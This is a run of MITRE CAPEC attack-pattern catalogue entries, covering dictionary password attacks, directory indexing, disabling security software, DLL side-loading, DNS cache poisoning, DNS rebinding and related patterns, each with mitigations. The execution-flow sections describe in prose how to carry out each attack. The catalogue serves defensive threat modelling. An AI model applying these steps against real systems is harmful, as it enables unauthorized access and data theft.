[REF-739] Bosco Sebastian. "DHCP Spoofing 101". McAfee. 2019-08-02. <https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dhcp-client-remote-code-execution-vulnerability-demystified/>. URL validated: 2022-09-22.

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)

CAPEC-16: Dictionary-based Password Attack

Attack Pattern ID: 16

Abstraction: Detailed

View customized information:

Description

Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	49	Password Brute Forcing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	600	Credential Stuffing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Employ Probabilistic Techniques

Execution Flow

Explore

Determine application's/system's password policy: Determine the password policies of the target application/system.

Techniques
Determine minimum and maximum allowed password lengths.
Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

Select dictionaries: Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.)
Techniques
Select dictionary based on particular users' preferred languages.
Select dictionary based on the application/system's supported languages.

Determine username(s) to target: Determine username(s) whose passwords to crack.

Techniques
Obtain username(s) by sniffing network packets.
Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not)
Obtain usernames from filesystem (e.g. list of directories in C:\Documents and Settings\ in Windows, and list in /etc/passwd in UNIX-like systems)

Exploit

Use dictionary to crack passwords.: Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work.

Techniques
Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s).
Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s).

Prerequisites

The system uses one factor password based authentication.

The system does not have a sound password policy that is being enforced.

The system does not implement an effective password throttling mechanism.

Skills Required

[Level: Low]

A variety of password cracking tools and dictionaries are available to launch this type of an attack.

Resources Required

A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack.

Indicators

Many invalid login attempts are coming from the same machine (same IP address) or for the same log in name. The login attempts use passwords that are dictionary words.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authentication	Gain Privileges
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Create a strong password policy and ensure that your system enforces this policy.

Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.

Leverage multi-factor authentication for all authentication services.

Example Instances

A system user selects the word "treacherous" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.

The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.

Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.

Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques.

CAPEC-127: Directory Indexing

Attack Pattern ID: 127

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	54	Query System for Information

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Directory Discovery: Use a method, either manual, scripted, or automated to discover the directories on the server by making requests for directories that may possibly exist. During this phase the adversary is less concerned with whether a directory can be accessed or indexed and more focused on simply discovering what directories do exist on the target.

Techniques
Send requests to the web server for common directory names
If directories are discovered that are native to a server type further refine the directory search to include directories usually present on those types of servers.
Search for uncommon or potentially user created directories that may be present.

Experiment

Iteratively explore directory/file structures: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

Techniques
Use a scanner tool to dynamically add directories/files to include their scan based upon data obtained in initial probes.
Use a browser to manually explore the website by issuing a request ending the URL in a slash '/'.
Attempt to bypass ACLs on directories by using methods that known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
Sequentially request a list of common base files to each directory discovered.
Try multiple fuzzing techniques to list directory contents for directories that will not reveal their contents with a "/" request

Exploit

Read directories or files which are not intended for public viewing.: The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods

Techniques
Try multiple exploit techniques to list directory contents for directories that will not reveal their contents with a "/" request
Try other known exploits to elevate privileges sufficient to bypass protected directories.
List the files in the directory by issuing a request with the URL ending in a "/" slash.
Access the files via direct URL and capture contents.
Attempt to bypass ACLs on directories by using methods that are known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.
Sequentially request a list of common base files to each directory discovered.

Prerequisites

The target must be misconfigured to return a list of a directory's content when it receives a request that ends in a directory name rather than a file name.

The adversary must be able to control the path that is requested of the target.

The administrator must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory.

The server version or patch level must not inherently prevent known directory listing attacks from working.

Skills Required

[Level: Low]

To issue the request to URL without given a specific file name

[Level: High]

To bypass the access control of the directory of listings

Resources Required

Ability to send HTTP requests to a web application.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.

2. Preventing with .htaccess in Apache web server: In .htaccess, write "Options-indexes".

3. Suppressing error messages: using error 403 "Forbidden" message exactly like error 404 "Not Found" message.

Example Instances

The adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80

The target application does not have direct hyperlink to the "backup" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a "db_dump.php" file in it. This sensitive data should not be disclosed publicly.

Related Weaknesses

CWE-ID	Weakness Name
424	Improper Protection of Alternate Path
425	Direct Request ('Forced Browsing')
288	Authentication Bypass Using an Alternate Path or Channel
285	Improper Authorization
732	Incorrect Permission Assignment for Critical Resource
276	Incorrect Default Permissions
693	Protection Mechanism Failure

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1083	File and Directory Discovery

References

[REF-11] "WASC Threat Classification 2.0". WASC-16 - Directory Indexing. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/Directory-Indexing>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References, Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Examples-Instances, Related_Vulnerabilities
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses

CAPEC-578: Disable Security Software

Attack Pattern ID: 578

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	176	Configuration/Environment Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The adversary must have the capability to interact with the configuration of the targeted system.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Availability	Hide Activities

Mitigations

Ensure proper permissions are in place to prevent adversaries from altering the execution status of security tools.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1556.006	Modify Authentication Process: Multi-Factor Authentication
1562.001	Impair Defenses: Disable or Modify Tools
1562.002	Impair Defenses: Disable Windows Event Logging
1562.004	Impair Defenses: Disable or Modify System Firewall
1562.007	Impair Defenses: Disable or Modify Cloud Firewall
1562.008	Impair Defenses: Disable Cloud Logs
1562.009	Impair Defenses: Safe Mode Boot

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Taxonomy_Mappings

CAPEC-583: Disabling Network Hardware

Attack Pattern ID: 583

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	582	Route Disabling

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area.

Consequences

Scope	Impact	Likelihood
Availability	Other

Mitigations

Ensure rigorous physical defensive measures to keep the adversary from accessing critical systems..

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-464] "Analysis of Country-wide Internet Outages Caused by Censorship". Center for Applied Internet Data Analysis. 2011. <http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-12 (Version 2.9)	Seamus Tuohy
2017-01-12 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-641: DLL Side-Loading

Attack Pattern ID: 641

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	159	Redirect Access to Libraries

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The target must fail to verify the integrity of the DLL before using them.

Skills Required

[Level: High]

Trick the operating system in loading a malicious DLL instead of a legitimate DLL.

Consequences

Scope	Impact	Likelihood
Integrity	Execute Unauthorized Commands Bypass Protection Mechanism

Mitigations

Prevent unknown DLLs from loading through using an allowlist policy.

Patch installed applications as soon as new updates become available.

Properly restrict the location of the software being used.

Use of sxstrace.exe on Windows as well as manual inspection of the manifests.

Require code signing and avoid using relative paths for resources.

Related Weaknesses

CWE-ID	Weakness Name
706	Use of Incorrectly-Resolved Name or Reference

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1574.002	Hijack Execution Flow:DLL Side-Loading

References

[REF-501] Stewart A.. "DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry". FireEye. <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Taxonomy_Mappings
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Taxonomy_Mappings

CAPEC-589: DNS Blocking

Attack Pattern ID: 589

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	603	Blockage

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Manipulate System Resources

Prerequisites

This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection.

Consequences

Scope	Impact	Likelihood
Availability	Other

Mitigations

Hard Coded Alternate DNS server in applications

Avoid dependence on DNS

Include "hosts file"/IP address in the application.

Ensure best practices with respect to communications channel protections.

Use a .onion domain with Tor support

Example Instances

Full URL Based Filtering: Filtering based upon the requested URL.

URL String-based Filtering: Filtering based upon the use of particular strings included in the requested URL.

Related Weaknesses

CWE-ID	Weakness Name
300	Channel Accessible by Non-Endpoint

References

[REF-473] "Censorship in the Wild: Analyzing Internet Filtering in Syria". Sigcomm. 2014. <http://conferences2.sigcomm.org/imc/2014/papers/p285.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-12 (Version 2.9)	Seamus Tuohy
2017-01-12 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns, Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations

CAPEC-142: DNS Cache Poisoning

Attack Pattern ID: 142

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	141	Cache Poisoning
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	89	Pharming

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Explore resolver caches: Check DNS caches on local DNS server and client's browser with DNS cache enabled.
Techniques
Run tools that check the resolver cache in the memory to see if it contains a target DNS entry.
Figure out if the client's browser has DNS cache enabled.

Experiment

Attempt sending crafted records to DNS cache: A request is sent to the authoritative server for target website and wait for the iterative name resolver. An adversary sends bogus request to the DNS local server, and then floods responses that trick a DNS cache to remember malicious responses, which are wrong answers of DNS query.

Techniques
Adversary must know the transaction ID by intercepting a DNS query, or sending a bogus query with known transaction ID.
If the transaction ID used to identify each query instance is randomized in some new DNS software, the attack must guess the transaction ID. Slow the response of the real DNS server by causing Denial-of-service. This gives adversaries enough time to guess transaction
Adversary crafts DNS response with the same transaction ID as in the request. The adversary sends out DNS responses before the authorized DNS server. This forces DNS local cache stores fake DNS response (wrong answer). The fake DNS responses usually include a malicious website's IP address.

Exploit

Redirect users to malicious website: As the adversary succeeds in exploiting the vulnerability, the victim connects to a malicious site using a good web site's domain name.

Techniques
Redirecting Web traffic to a site that looks enough like the original so as to not raise any suspicion.
Adversary-in-the-Middle (CAPEC-94) intercepts secure communication between two parties.

Prerequisites

A DNS cache must be vulnerable to some attack that allows the adversary to replace addresses in its lookup table.Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions.

Skills Required

[Level: Medium]

To overwrite/modify targeted DNS cache

Resources Required

The adversary must have the resources to modify the targeted cache. In addition, in most cases the adversary will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the adversary's goals.

Mitigations

Configuration: Make sure your DNS servers have been updated to the latest versions

Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.

Configuration: Disable client side DNS caching.

Example Instances

In this example, an adversary sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.

Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the adversary floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com

When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.

Related Weaknesses

CWE-ID	Weakness Name
348	Use of Less Trusted Source
345	Insufficient Verification of Data Authenticity
349	Acceptance of Extraneous Untrusted Data With Trusted Data
346	Origin Validation Error
350	Reliance on Reverse DNS Resolution for a Security-Critical Action

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1584.002	Compromise Infrastructure: DNS Server

References

[REF-22] "Wikipedia". DNS Cache Poisoning. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/DNS_cache_poisoning>.

[REF-23] "DNS Threats and DNS Weaknesses". DNS Threats & Weaknesses of the Domain Name System. DNSSEC. <http://www.dnssec.net/dns-threats.php>.

[REF-27] "Vulnerability Note VU#800113". US CERT. 2008-07-08. <http://www.kb.cert.org/vuls/id/800113#pat>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Related_Vulnerabilities, Resources_Required
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Weaknesses, Taxonomy_Mappings

CAPEC-585: DNS Domain Seizure

Attack Pattern ID: 585

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	582	Route Disabling

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Manipulate System Resources

Prerequisites

This attack pattern requires that the adversary has cooperation from the registrar of the target domain.

Consequences

Scope	Impact	Likelihood
Availability	Other

Example Instances

The FBI's seizure of gambling websites, the US DOJ's seizure of child pornography websites, and Microsoft's seizure of all domains owned by the company No-IP in order to disrupt a cyberattack originating from a subset of those domains.

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-467] "Dozens of Online 'Dark Markets' Seized Pursuant to Forfeiture Complaint Filed in Manhattan Federal Court in Conjunction with the Arrest of the Operator of Silk Road 2.0". FBI. 2014. <https://www.fbi.gov/contact-us/field-offices/newyork/news/press-releases/dozens-of-online-dark-markets-seized-pursuant-to-forfeiture-complaint-filed-in-manhattan-federal-court-in-conjunction-with-the-arrest-of-the-operator-of-silk-road-2.0>.

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-12 (Version 2.9)	Seamus Tuohy
2017-01-12 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Description

CAPEC-275: DNS Rebinding

Attack Pattern ID: 275

Abstraction: Detailed

View customized information:

Description

Extended Description

Web browsers enforce security zones based on DNS names in order to prevent cross-zone disclosure of information. Because the same name resolves to both these IP addresses, browsers will place both IP addresses in the same security zone and allow information to flow between the addresses. This allows adversaries to discover sensitive information about the internal network of an enterprise. If there is a trust relationship between the computer with the targeted browser and the internal machine the adversary identifies, additional attacks are possible. This attack differs from pharming attacks in that the adversary is the legitimate owner of the malicious DNS server and so does not need to compromise behavior of external DNS services.

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	194	Fake the Source of Data

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Identify potential DNS rebinding targets: An adversary publishes content on their own server with their own name and DNS server. Attract HTTP traffic and explore rebinding vulnerabilities in browsers, flash players of old version.
Techniques
Adversary uses Web advertisements to attract the victim to access adversary's DNS. Explore the versions of web browser or flash players in HTTP request.

Experiment

Establish initial target access to adversary DNS: The first time the target accesses the adversary's content, the adversary's name must be resolved to an IP address. The adversary's DNS server performs this resolution, providing a short Time-To-Live (TTL) in order to prevent the target from caching the value.
Rebind DNS resolution to target address: The target makes a subsequent request to the adversary's content and the adversary's DNS server must again be queried, but this time the DNS server returns an address internal to the target's organization that would not be accessible from an outside source.
Determine exploitability of DNS rebinding access to target address: The adversary can then use scripts in the content the target retrieved from the adversary in the original message to exfiltrate data from the named internal addresses.

Exploit

Access & exfiltrate data within the victim's security zone: The adversary can then use scripts in the content the target retrieved from the adversary in the original message to exfiltrate data from the internal addresses. This allows adversaries to discover sensitive information about the internal network of an enterprise.

Techniques
Adversary attempts to use victim's browser as an HTTP proxy to other resources inside the target's security zone. This allows two IP addresses placed in the same security zone.
Adversary tries to scan and access all internal hosts in victim's local network by sending multiple short-lived IP addresses.

Prerequisites

The target browser must access content server from the adversary controlled DNS name. Web advertisements are often used for this purpose. The target browser must honor the TTL value returned by the adversary and re-resolve the adversary's DNS name after initial contact.

Skills Required

[Level: Medium]

Setup DNS server and the adversary's web server. Write a malicious script to allow the victim to connect to the web server.

Resources Required

The adversary must serve some web content that a victim accesses initially. This content must include executable content that queries the adversary's DNS name (to provide the second DNS resolution) and then performs the follow-on attack against the internal system. The adversary also requires a customized DNS server that serves an IP address for their registered DNS name, but which resolves subsequent requests by a single client to addresses internal to that client's network.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism

Mitigations

Design: IP Pinning causes browsers to record the IP address to which a given name resolves and continue using this address regardless of the TTL set in the DNS response. Unfortunately, this is incompatible with the design of some legitimate sites.

Implementation: Reject HTTP request with a malicious Host header.

Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses.

Example Instances

The adversary registers a domain name, such as www.evil.com with IP address 1.3.5.7, delegates it to their own DNS server (1.3.5.2), and uses phishing links or emails to get HTTP traffic. Instead of sending a normal TTL record, the DNS server sends a very short TTL record (for example, 1 second), preventing DNS response of entry[www.evil.com, 1.3.5.7] from being cached on victim's (192.168.1.10) browser. The adversary's server first responds to the victim with malicious script such as JavaScript, containing IP address (1.3.5.7) of the server. The adversary uses XMLHttpRequest (XHR) to send HTTP request or HTTPS request directly to the adversary's server and load response. The malicious script allows the adversary to rebind the host name to the IP address (192.168.1.2) of a target server that is behind the firewall. Then the server responds to the adversary's real target, which is an internal host IP (192.168.1.2) in the same domain of the victim (192.168.1.10). Because the same name resolves to both these IP addresses, browsers will place both IP addresses (1.3.5.7 and 192.168.1.2) in the same security zone and allow information to flow between the addresses. Further, the adversary can achieve scanning and accessing all internal hosts in the victim's local network (192.168.X.X) by sending multiple short-lived IP addresses.

Related Weaknesses

CWE-ID	Weakness Name
350	Reliance on Reverse DNS Resolution for a Security-Critical Action

References

[REF-119] Collin Jackson, Adam Barth, Andrew Bortz, Weidong Shao and Dan Boneh. "Protecting Browsers from DNS Rebinding Attacks". In Proceedings of ACM CCS 07.

[REF-120] "Wikipedia". DNS rebinding. The Wikimedia Foundation, Inc. <http://en.wikipedia.org/wiki/DNS_rebinding>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Weaknesses
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
